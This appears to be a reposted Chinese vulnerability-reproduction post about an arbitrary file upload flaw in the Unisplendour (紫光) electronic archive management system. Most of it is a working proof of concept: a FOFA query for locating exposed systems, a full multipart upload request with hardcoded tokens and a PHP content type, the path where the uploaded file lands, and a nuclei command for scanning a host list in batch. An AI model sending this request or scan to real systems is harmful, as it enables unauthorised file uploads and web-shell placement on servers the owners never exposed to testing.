0x01 阅读须知
融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
0x02 漏洞描述
紫光电子档案管理系统存在任意文件上传漏洞。
0x03 漏洞复现
fofa-query: app="紫光档案管理系统"
1.输入下数据包,得到回显
POST
/System/Cms/upload.html?token=5117e82385cef4c12547fdd4c028b97a1-1
HTTP/1.1
Host
: {{Hostname}}
User-Agent
: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection
: close
Content-Length
: 600
Accept
: application/json, text/javascript, */*; q=0.01
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundarygIRYWNxmDYiZBguT
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-
data
; name=
"userID"
admin
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-
data
; name=
"fondsid"
1
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-
data
; name=
"comid"
1
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-
data
; name=
"token"
6
b79a77180e9ec3a7ca351ebe54641a2
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-
data
; name=
"files[]"
; filename=
"1111.txt"
Content-Type: text/php
11111
------WebKitFormBoundarygIRYWNxmDYiZBguT--
2.访问上传路径,得到1.txt的内容/uploads/company1/fonds1/cms/20230906/UNIS-R0O41iGgBrdKEMQ1dZ3x0a4at.txt
nuclei
.exe
-t
ziguang-unis-upload-fileupload
.yaml
-l
subs
.txt
原文始发于微信公众号(融云攻防实验室):漏洞复现 紫光电子档案管理系统存在任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论